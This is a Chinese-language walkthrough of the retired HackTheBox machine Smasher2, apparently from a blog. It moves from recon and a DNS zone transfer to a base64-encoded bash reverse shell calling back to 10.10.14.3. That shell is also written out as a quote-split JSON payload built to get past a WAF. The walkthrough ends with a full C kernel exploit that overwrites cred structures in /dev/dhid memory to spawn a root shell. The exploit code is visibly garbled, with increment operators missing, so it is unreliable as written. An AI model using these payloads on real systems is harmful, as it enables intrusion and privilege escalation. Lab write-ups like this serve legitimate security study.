本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.135

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

执行命令 autorecon 10.10.10.135 -o ./Smasher2-autorecon

有dns服务开启，试试区域传送

dig -t axfr smasher2.htb @10.10.10.135

发现好些域名，绑定hosts访问

10.10.10.135 wonderfulsessionmanager.smasher2.htb smasher2.htb root.smasher2.htb

爆破下目录

发现目录backup有敏感文件

先把上面两个文件下载下来放着，访问绑定的hosts域名发现一个登陆窗口

这里卡了很久，本靶机难度还是很高的，后来通过网上的writeup分析上面下载下来的文件，得出如下，具体分析可参考：https://0xdf.gitlab.io/2019/12/14/htb-smasher2.html

得到api接口的请求key值，可以通过此key执行命令，在测试的过程中发现有WAF对常规的命令进行拦截，直接使用绕过WAF的执行命令代码反弹shell

WAF绕过技术https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0echo '/bin/bash -i >& /dev/tcp/10.10.14.3/8833 0>&1' | base64L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMvODgzMyAwPiYxCg==原始命令echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMvODgzMyAwPiYxCg== | base64 -d | bash绕过WAF命令{"schedule":"ec''ho 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMvODgzMyAwPiYxCg=='|'b'a''s''e'6'4 -'d'|b'a''s'h"}

为了稳定方便的连接目标靶机，本地生成公钥和私钥，然后通过私钥连接到目标靶机

准备root提权，这里提权需要自己写exploit，具体分析和编写exploit参考：https://0xdf.gitlab.io/2019/12/14/htb-smasher2.html#priv-dzonerzy--root

#include <stdio.h>#include <fcntl.h>#include <stdlib.h>#include <string.h>#include <unistd.h>#include <sys/types.h>#include <sys/mman.h>int main ( int argc, char * const * argv){    printf ( "[ ] PID: %d\n" , getpid());    int fd = open( "/dev/dhid" , O_RDWR);    if (fd < 0 )    {    printf ( "[-] Open failed!\n" );    return -1 ;    }    printf ( "[ ] Open OK fd: %d\n" , fd);    unsigned long size = 0xf0000000 ;    unsigned long mmapStart = 0x42424000 ;    unsigned int * addr = ( unsigned int *)mmap(( void *)mmapStart, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x0 );    if (addr == MAP_FAILED)    {    perror( "Failed to mmap: " );    close(fd);    return -1 ;    }    printf ( "[ ] mmap OK addr: %lx\n" , addr);    unsigned int uid = getuid();    printf ( "[ ] UID: %d\n" , uid);    unsigned int credIt = 0 ;    unsigned int credNum = 0 ;    while ((( unsigned long )addr) < (mmapStart   size - 0x40 ))    {credIt = 0 ;    if ( addr[credIt  ] == uid && addr[credIt  ] == uid && addr[credIt  ] == uid && addr[credIt  ] == uid && addr[credIt  ] == uid && addr[credIt  ] == uid && addr[credIt  ] == uid && addr[credIt  ] == uid )    {    credNum  ;    printf ( "[ ] Found cred structure! ptr: %p, credNum: %d\n" , addr, credNum);    credIt = 0 ;    addr[credIt  ] = 0 ;    addr[credIt  ] = 0 ;    addr[credIt  ] = 0 ;    addr[credIt  ] = 0 ;    addr[credIt  ] = 0 ;    addr[credIt  ] = 0 ;    addr[credIt  ] = 0 ;    addr[credIt  ] = 0 ;    if (getuid() == 0 )    {    puts ( "[ ] GOT ROOT!" );    credIt  = 1 ; //Skip 4 bytes, to get capabilities addr    addr[credIt  ] = 0xffffffff ;    addr[credIt  ] = 0xffffffff ;    addr[credIt  ] = 0xffffffff ;    addr[credIt   ] = 0xffffffff ;    addr[credIt  ] = 0xffffffff ;    addr[credIt  ] = 0xffffffff ;    addr[credIt  ] = 0xffffffff ;    addr[credIt  ] = 0xffffffff ;    addr[credIt  ] = 0xffffffff ;    addr[credIt  ] = 0xffffffff;    execl( "/bin/sh" , "-" , ( char *) NULL );    puts ( "[-] Execl failed..." );    break ;    }    else    {    credIt = 0 ;    addr[credIt  ] = uid;    addr[credIt  ] = uid;    addr[credIt  ] = uid;    addr[credIt  ] = uid;    addr[credIt  ] = uid;    addr[credIt  ] = uid;    addr[credIt  ] = uid;    addr[credIt  ] = uid;    }    }    addr  ;    }    puts ( "[ ] Scanning loop END" );    fflush( stdout );    int stop = getchar();    return 0 ;}

通过本地kali编译完成之后再使用scp传到目标靶机执行exploit提权